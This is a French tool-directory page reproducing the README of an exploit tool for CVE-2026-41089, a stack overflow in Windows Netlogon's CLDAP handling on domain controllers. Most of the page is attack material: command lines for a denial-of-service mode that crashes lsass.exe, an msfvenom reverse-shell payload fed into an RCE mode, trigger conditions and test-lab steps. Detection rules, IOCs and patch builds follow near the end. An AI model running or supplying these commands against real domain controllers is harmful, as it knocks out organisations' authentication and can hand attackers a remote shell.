Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41089 — CVE-2026-41089 est une vulnérabilité critique d'exécution de code à distance dans le service Windows Netlogon ; un seul paquet peut faire planter lsass.exe, provoquant le redémarrage du contrôleur de domaine en 30 à 60 secondes. Pendant cette période, toute authentification de domaine sur ce DC échouera. | Kitploit
Outils/GitHubGitHub/hnytgl/cve-2026-41089
Analyse des VulnérabilitésExploitationTests d'IntrusionOutil d'Accès à DistanceExploitation de Binaires
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

Voir le dépôt
141214il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE-2026-41089 est une vulnérabilité critique d'exécution de code à distance dans le service Windows Netlogon ; un seul paquet peut faire planter lsass.exe, provoquant le redémarrage du contrôleur de domaine en 30 à 60 secondes. Pendant cette période, toute authentification de domaine sur ce DC échouera.

Partager

CVE-2026-41089 — Exploitation de débordement de pile RCE via Netlogon CLDAP sous Windows

CVE-ID : CVE-2026-41089
CVSS : 9.8 (Critique)
CWE : CWE-121 (Débordement de pile basé sur la pile)
Vecteur d'attaque : UDP/389 (CLDAP SearchRequest)
Impact : Exécution de code à distance (RCE) / Déni de service (DoS)
Versions affectées : Windows Server 2012 R2 ~ 2025 (Contrôleurs de domaine)
Correctif : Mise à jour cumulative de mai 2026

Aperçu de la vulnérabilité

La fonction NetpLogonPutUnicodeString dans netlogon.dll présente une vulnérabilité de débordement de pile lors du traitement des requêtes de recherche CLDAP. Cette fonction reçoit un budget de longueur en octets, mais l'interprète comme un comptage de WCHAR, ce qui entraîne une écriture 2 fois plus grande que prévu.

Le débordement se produit dans le tampon de pile fixe de 528 octets (264 ushort) de la fonction NlGetLocalPingResponse. Le champ User contrôlé par l'attaquant, combiné au nom de domaine DNS du serveur lui-même, remplit ce tampon, écrasant finalement le cookie de sécurité GS, ce qui déclenche et le crash de .

__report_gsfailure
lsass.exe

Conditions de déclenchement

  • NtVer=0x02 dans la CLDAP SearchRequest (force l'utilisation de l'ancien chemin BuildSamLogonResponse vulnérable)
  • Longueur du champ User ≥ ~130 caractères (limite binaire d'environ 260 octets UTF-16)
  • Longueur du nom de domaine DNS du serveur ≥ ~80 caractères (plus le nom de domaine est long, plus il est facile d'atteindre le cookie)

Remarque : NtVer=0x16 (valeur utilisée par de nombreux scripts de détection publics) déclenche le chemin sécurisé BuildSamLogonResponseEx, n'entraînant pas la vulnérabilité.

Fonctionnalités

ModeDescription
--mode dosEnvoie un paquet CLDAP spécialement conçu, provoquant le crash de LSASS et le redémarrage du DC (interruption d'authentification d'environ 60 secondes)
--mode rceTente une exécution de code à distance (niveau recherche, nécessite une shellcode)
--mode scanScanne les réponses pour différentes valeurs NtVer, effectue une empreinte du DC cible
--mode autoDétection automatique et sélection de la meilleure stratégie d'attaque

Mode DoS

Un seul paquet provoque le crash de lsass.exe, forçant le contrôleur de domaine à redémarrer en 30 à 60 secondes. Pendant cette période, toutes les authentifications de domaine sur ce DC échouent.

root@kitploit:~
# Utilisation de base — envoie 3 paquets
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# Attaque rapide avec un seul paquet
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# Mode agressif — 5 paquets en concurrence
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

Mode RCE

⚠️ Niveau recherche — peu fiable et instable en environnement réel.

Le RCE est confronté aux défis suivants :

  1. Les données de débordement sont le nom DNS du serveur lui-même, pas la shellcode de l'attaquant
  2. Le GS Cookie doit être contourné (nécessite une primitive de fuite d'informations ou un brute-force)
  3. CET/ACG/CFG sur Server 2022+ rend le ROP traditionnel plus difficile
root@kitploit:~
# Générer une shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# Envoyer la chaîne RCE
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Mode Scan

root@kitploit:~
# Empreinte du DC cible
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Exemple de sortie attendue (cible corrigée) :

root@kitploit:~
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Exemple de sortie attendue (cible non corrigée) :

root@kitploit:~
NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Si NtVer=0x02 expire et que les autres versions répondent normalement, la cible est probablement vulnérable.

Paramètres avancés

ParamètreDescriptionValeur par défaut
-l, --user-lenLongueur du champ nom d'utilisateur (nombre de caractères ASCII)180
--ntverValeur NtVer (hexadécimale, ex. 0x02)0x02
--countNombre de paquets DoS envoyés3
--delayDélai entre les paquets (secondes)0.5
-t, --timeoutTimeout de socket (secondes)5.0
--jsonAffiche les résultats au format JSON—
--rawAffiche le paquet brut en hexadécimal avant envoi—
--quietSupprime l'affichage de la bannière—
--shellcode-fileFichier de shellcode personnalisé (x64 brut)—
--lhostAdresse d'écoute du reverse shell—
--lportPort d'écoute du reverse shell4444

Configuration de l'environnement de test

root@kitploit:~
# Créer un contrôleur de domaine avec un nom de domaine long sur un Windows Server non corrigé :
# 1. Promouvoir en contrôleur de domaine (nom DNS long, ex. "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. Vérifier que le patch de mai 2026 n'est pas installé
# 3. Depuis la machine attaquante, exécuter :
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. Observer le crash et le redémarrage du DC

Indicateurs de compromission (IOCs)

Réseau

  • CLDAP SearchRequest sur UDP/389 avec User > 100 octets et NtVer = 0x02
  • Trafic CLDAP anormal depuis des hôtes non contrôleurs de domaine vers le DC

Hôte

root@kitploit:~
Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Règles de détection

root@kitploit:~
index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
root@kitploit:~
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Informations sur le correctif

Version de Windows ServerNuméro de build corrigéRemarques
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

Avis juridique

Cet outil est destiné exclusivement aux évaluations de sécurité autorisées, tests d'intrusion, compétitions CTF et recherches défensives. L'utilisation de cet outil sur tout système sans autorisation écrite explicite est illégale. L'utilisateur assume l'entière responsabilité légale.

Références

  • Guide de mise à jour de sécurité Microsoft : CVE-2026-41089
  • NVD : CVE-2026-41089
  • Recherche Kudelski Security — Analyse du débordement de pile Netlogon
  • Analyse SecPod — IOCs et détection
  • Centre de menaces IONIX — CVE-2026-41089
Télécharger l’outil